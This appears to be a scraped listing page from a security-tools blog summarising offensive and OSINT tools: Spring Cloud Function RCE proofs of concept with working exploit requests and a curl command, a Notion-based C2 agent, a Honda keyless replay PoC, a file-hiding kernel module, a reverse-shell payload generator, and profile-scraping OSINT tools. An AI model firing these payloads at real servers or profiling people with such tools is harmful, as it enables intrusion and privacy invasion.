Slyther : AWS Security Tool
Slyther is AWS Security tool to check read/write/delete access for S3 buckets. Requirements aws-cli Installation pip3 install -r requirements.txt Usage example python3 slyther.py -b flaws.cloud Download
Spring-Spel-0Day-Poc : Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression
Spring-Spel-0Day-Poc is spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar get path lists for test find . -name "*.java"|xargs -I % cat %|grep -Eo '"({8,})"'|sort -u|sed 's/"//g' …functionRouteruppercaselowercase… poc1 POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")Content-Length: 5 poc2 POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15...
Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries
.png "Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries")
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simple filtering rules, it's very difficult to precisely target Cloak with...
OffensiveNotion : Notion As A Platform For Offensive Operations
OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent sends data to and receives commands from your Notion page. Your C2 traffic blends right in as the agent receives instructions and posts results via the Notion developer API. And when your blue team looks for evidence of shenanigans,...
CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System
.png "CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System")
CVE-2022-27254 is a PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254). Summary This is a proof of concept for CVE-2022-27254, wherein the remote keyless system on various Honda vehicles send the same, unencrypted RF signal for each door-open, door-close, boot-open and remote start(if applicable). This allows for an attacker to eavesdrop on the request and conduct a replay attack. Vehicles Affected • 2016-2020 Honda...
CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
.png "CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability")
CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' Or using Burp suite: Download
Casper-Fs : A Custom Hidden Linux Kernel Module Generator
.png "Casper-Fs : A Custom Hidden Linux Kernel Module Generator")
Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even the root has permission to see the files or make actions like edit and remove. The files...
LAZYPARIAH : A Tool For Generating Reverse Shell Payloads On The Fly
.png "LAZYPARIAH : A Tool For Generating Reverse Shell Payloads On The Fly")
LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly. The reverse shell payloads that LAZYPARIAH supports include (but are not limited to): C binary payloads (compiled on the fly): c_binaryRuby payloads: ruby, ruby_b64, ruby_hex, ruby_cPowershell payloads: powershell_c, powershell_b64Base64-encoded Python payloads: python_b64Rust binary payloads...
Socid-Extractor : Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose
Socid-Extractor Extracts information about a user from profile webpages / API responses and save it in machine-readable format. Usage As a command-line tool: $ socid_extractor --url https://www.deviantart.com/muse1908country: Francecreated_at: 2005-06-16 18:17:41gender: femaleusername: Muse1908website: www.patreon.com/musemercierlinks: tagline: Nothing worth having is easy… Without installing: $ ./run.py --url https://www.deviantart.com/muse1908 As a Python library: import socid_extractor, requestsr = requests.get('https://www.patreon.com/annetlovart')socid_extractor.extract(r.text){'patreon_id': '33913189', 'patreon_username': 'annetlovart', 'fullname': 'Annet Lovart', 'links': ""} Installation $ pip3 install socid-extractor The latest...
Gitcolombo : Extract And Analyze Contributors Info From Git Repos
.png "Gitcolombo : Extract And Analyze Contributors Info From Git Repos")
Git colombo is an OSINT tool to extract info about persons from git repositories: common names, emails, matches between different (as it may seems) accounts. Using Install gitRun: from any git url./gitcolombo.py -u https://github.com/Kalanchyovskaia16/newlpsfrom directory, recursively./gitcolombo.py -d ./newlps -rfrom all GitHub personal/org repos by nickname./gitcolombo.py --nickname LubyRuffy For batch cloning from Gitlab and Bitbucket group repos you can use ghorg. Output: verbose persons infonameemailnumber of appearences...
